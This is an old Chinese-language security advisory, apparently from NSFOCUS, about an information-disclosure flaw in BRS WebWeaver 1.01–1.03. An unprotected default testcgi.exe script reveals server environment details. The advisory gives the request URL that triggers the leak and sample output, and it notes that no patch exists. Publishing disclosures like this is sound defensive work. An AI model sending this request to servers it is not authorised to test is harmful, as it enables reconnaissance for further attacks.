安全研究
安全漏洞
BRS WebWeaver远程信息泄露漏洞
发布日期:2003-04-04
更新日期:2003-04-14
受影响系统:
BRS WebWeaver 1.03描述:
BRS WebWeaver 1.02
BRS WebWeaver 1.01
BUGTRAQ ID: 7283
BRS WebWeaver是一款集成小型快速的HTTP和FTP服务程序,提供目录保护功能,适用于Windows 9x/NT操作系统。
BRS WebWeaver包含的testcgi.exe没有设置任何访问限制,远程攻击者可以利用这个脚本获得大量系统敏感信息。
默认安装下,会安装'scripts/testcgi.exe'CGI文件,此脚本会输入大量系统敏感信息,并且任何访问限制,攻击者可以直接请求这个文件获得信息,利用这些信息进一步对系统进行攻击。
<*来源:euronymous (just-a-user@yandex.ru)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=104925053313311&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://hostname/scripts/testcgi.exe
会显示如下信息:
}--------------- start of testcgi.exe output ---------------{
CGI Test Program
Arguments To Testcgi
Argument 1 :
Environment Variables
HTTP_CONNECTION = keep-alive
HTTP_KEEP_ALIVE = 300
HTTP_ACCEPT_CHARSET = utf-8,*
HTTP_ACCEPT_ENCODING = gzip,deflate,compress;q=0.9
HTTP_ACCEPT_LANGUAGE = ru-ru,ru;q=0.5
HTTP_ACCEPT = \
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/ \
x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1 HTTP_USER_AGENT = \
Mozilla/5.0 (Windows; U; Win98; ru-RU; rv:1.3) Gecko/20030309 HTTP_HOST = \
localhost SERVER_PORT = 80
URL = /scripts/testcgi.exe
LOCAL_ADDR = 195.***.**.**
CONTENT_LENGTH = 0
SERVER_SOFTWARE = BRS WebWeaver/1.03
SERVER_PROTOCOL = HTTP/1.0
SERVER_NAME = ******30
REMOTE_HOST = 127.0.0.1
REMOTE_ADDR = 127.0.0.1
REQUEST_METHOD = GET
DOCUMENT_ROOT = c:\program files\webweaver
SCRIPT_NAME = /scripts/testcgi.exe
GATEWAY_INTERFACE = CGI/1.1
WINDIR = C:\WINDOWS
CMDLINE = WIN
COMSPEC = C:\WINDOWS\COMMAND.COM
PATH = C:\WINDOWS;C:\WINDOWS\COMMAND
WINBOOTDIR = C:\WINDOWS
PROMPT = $p$g
TEMP = C:\WINDOWS\TEMP
TMP = C:\WINDOWS\TEMP
Miscellaneous Information
Working directory: C:/Program Files/WebWeaver/scripts/
Current date and time: 2003/03/31 5:07:32
}--------------- end of testcgi.exe output ---------------{
建议:
厂商补丁:
BRS
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.bsoutham.org/WebWeaver/
浏览次数:2915
严重程度:0(网友投票)
绿盟科技给您安全的保障